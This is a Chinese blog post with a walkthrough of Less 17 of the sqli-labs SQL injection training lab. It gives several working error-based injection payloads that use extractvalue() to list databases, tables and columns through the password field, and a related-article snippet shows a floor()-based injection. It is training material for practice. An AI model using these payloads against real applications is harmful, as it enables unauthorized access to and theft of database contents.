sqli - labs - Less 17

已于 2022-08-11 19:47:12 修改
阅读量234 收藏 1
点赞数 1
文章标签: 数据库 sql
于 2022-08-11 18:01:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62102000/article/details/126289022
版权

我们先来看看源码

这里我们可以看到,首先进行上传数据的判断,但是$uname是通过上面的check_input函数进行相关过滤所以用户名必须要正确,密码可以忽略。

所以本关在密码这里找到突破口

可以看出在得到row变量之后,如果不为空,代码将要使用我们的passwd替换password

所以我们本次用的报错注入

这里会有两个报错注入函数updatexml()和extractvalue()

这里我使用的是extractvalue()函数来进行注入

首先查看数据库名: 'and extractvalue(1,concat('%',database())) --+ 

可以发现数据库名为:security

查看所有数据库:' and extractvalue(1,concat('%',(select group_concat(schema_name) from information_schema.schemata))) --+

查看数据库中所有表:' and extractvalue(1,concat('%',(select group_concat(table_name) from information_schema.tables where table_schema='security'))) --+ 

查看uesr表中所有字段:'and extractvalue(1,concat('%',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) --+

完成!

呼呼个个
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
docker运行sqli-labs(超详细)
weixin_47276609的博客
03-15 1310
1 Docker for Windows的当前版本运行在64位Windows 10 Pro,专业版、企业版和教育版(1607年纪念更新,版本14393或更高版本)上。Ps:家庭版是不行的,如果你是家庭版,那么一是升级到专业版 2 如果你满足Docker for Windows的环境条件了,那么首先检查电脑的虚拟化开启了没有:进入任务管理器(ctrl+alt+delete),点击性能->cpu ,查看虚拟化是否已启用,如果虚拟化是已禁用,那么你需要重启电脑进入bios开启虚拟化(我们的发的笔记本cpu都
sqli-labs-master第三、四关
m_ing
05-08 329
前言:因为3、4两关比较相似所以放在一起方便大家理解哈。 第三关: http://192.168.89.131/sqli-labs-master/Less-3/ 看到提示:请输入ID作为带数值的参数。 我们还是老套路,遇到什么问题,在分析解决 http://192.168.89.131/sqli-labs-master/Less-3/?id=1’ 还是报语法错误。第二关我们分析了,有两种原因,...
Sqli-labs 查看源代码 1-20
foolisheddy
03-08 4380
Less-1 indexphp sqli-connectphp db-credsinc GET - 基于错误 - 单引号 - 字符型 Less-2 GET - 基于错误 - 整型 Less-3 基于错误 - 单引号变形 - 字符型 Less-4 基于错误 -双引号- 字符型 Less-5 Less-6 双注入-双引号-字符型 Less-7 单引号 双括号 非基于错误 Less-8 基于布尔 - 单引
sqli-labs————less 20
Fly_鹏程万里
05-12 1597
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
floor报错注入的两种格式
aitong的博客
01-31 429
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 12万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs-less17
qq_45106794的博客
10-23 823
#sqli-labs-less17 在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项 成功报错,说明passwd这一项可以进行注入 'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...
sqli-labs/Less-17
m0_71299382的博客
11-18 142
sqli-labs第十七关
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
安装sqli-labs
10-22
安装sqli-labs
如何mysql数据导入到mongdb
codemami的博客
05-30 619
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1054
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
oracle中的INTERVAL函数学习总结
weixin_42821740的博客
05-30 316
简单学懂interval函数
行列视(RCV)能否在指定时间生成报表数据?
最新发布
2401_83701843的博客
05-30 116
需要注意的是,要实现指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实现。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实现方式需要根据系统的配置和使用需求来确定。
SpringBoot 的 Java 代码配置(二)
xiaotu的博客
05-29 1081
因此,如果使用 HikariCP 只用声明你要用它就行,而声明要使用 Druid,你需要自己指定所使用的版本。上面的 DruidDataSource ,我们为其属性赋值时,它的四个属性都是简单类型属性,因此十分容易处理。但是,在 Spring 的容器中,Java Bean 可能会存在引用。在上面的 Druid 的配置中,数据库连接的四大属性值是在代码中『写死』的。而在 Java 代码配置中,通过 @Bean 方法的入参来表达 Bean 之间的引用关系。,所以,我们可以直接将自定义的配置项写在。
sqli-labs-less
07-25
- *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值